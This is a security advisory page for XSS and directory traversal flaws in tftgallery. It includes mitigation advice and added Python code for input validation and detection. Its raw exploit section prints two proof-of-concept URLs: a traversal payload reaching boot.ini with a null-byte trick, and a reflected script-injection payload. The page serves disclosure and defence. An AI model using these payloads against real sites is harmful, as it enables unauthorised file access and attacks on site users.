Cross-Site Scripting (XSS) and Directory Traversal
Vendor: tftgallery
By: Blake
CVSS: 8.8 (HIGH)
CWE: 79, 22
Product Name: tftgallery
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Album Parameter Vulnerability

The album parameter in the tftgallery application is vulnerable to Cross-Site Scripting (XSS) and Directory Traversal attacks. An attacker can inject malicious JavaScript code into the album parameter, which will be executed in the user's browser. An attacker can also use the album parameter to traverse the directory structure of the application, potentially gaining access to sensitive files.

Mitigation:

Input validation should be used to prevent malicious code from being injected into the album parameter. Access to sensitive files should be restricted and access control lists should be used to limit access to only authorized users.
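A defender-side illustration of the mitigation above, added here as example code that is not part of tftgallery or of the original advisory: an allowlist-plus-realpath check for the album parameter, output encoding for a reflected value, and a small classifier that flags the traversal, null-byte and markup patterns seen in the PoC URLs when scanning request targets. The gallery root, the name allowlist and the sample requests are assumptions (constructed for the example).

```python
import html
import os
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed gallery root; the page does not document tftgallery's real layout.
GALLERY_ROOT = os.path.realpath("/var/www/tftgallery/albums")
ALBUM_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}")  # allowlist: one plain directory name

def safe_album_path(album, root=GALLERY_ROOT):
    """Resolve ?album= to a directory under root, or return None for unsafe input."""
    album = unquote(album)
    # One check rejects ../, encoded slashes and the %00 truncation trick alike.
    if "\x00" in album or not ALBUM_NAME.fullmatch(album):
        return None
    candidate = os.path.realpath(os.path.join(root, album))
    # Defence in depth: whatever passed the regex must still resolve inside root.
    return candidate if os.path.commonpath([root, candidate]) == root else None

def render_album_title(album):
    """Output encoding for echoing a parameter back into HTML (the XSS side)."""
    return "<h1>" + html.escape(album, quote=True) + "</h1>"

# Detection: indicators for the two PoC patterns, applied to percent-decoded query values.
INDICATORS = {
    "traversal": re.compile(r"(^|[\\/])\.\.([\\/]|$)"),
    "null-byte": re.compile(r"\x00"),
    "html-injection": re.compile(r"<\s*/?\s*(script|link|img|svg|iframe)\b", re.I),
}

def classify_request(target):
    """Return the sorted indicator names found in any query value of one request target."""
    found = set()
    for values in parse_qs(urlsplit(target).query, keep_blank_values=True).values():
        for value in values:
            found.update(name for name, rx in INDICATORS.items() if rx.search(value))
    return sorted(found)

# Constructed request targets modelled on the PoC URLs quoted on this page.
SAMPLE_REQUESTS = [
    "/tftgallery/index.php?album=..%2F..%2F..%2F..%2Fboot.ini%00&page=1",
    "/tftgallery/settings.php?sample='></link><script>alert('x')</script>&name=cucumber%20cool",
    "/tftgallery/index.php?album=summer-2020&page=1",
]

def scan(targets=SAMPLE_REQUESTS):
    """Map each suspicious request target to its indicators; clean requests are omitted."""
    return {t: classify_request(t) for t in targets if classify_request(t)}
```

The classifier works on decoded values, so it also catches the `..%2F` and `%00` spellings used in the PoCs, not only literal `../`.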
Source

Exploit-DB raw data:

Released information about the album parameter being vulnerable to XSS
earlier. Seems there are other similar issues:

The album parameter is vulnerable to directory traversal

http://example.com/tftgallery/index.php?album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00&page=1

The sample parameter is vulnerable to XSS

http://example.com/tftgallery/settings.php?sample='></link><script>alert('blake XSS test')</script>&name=cucumber%20cool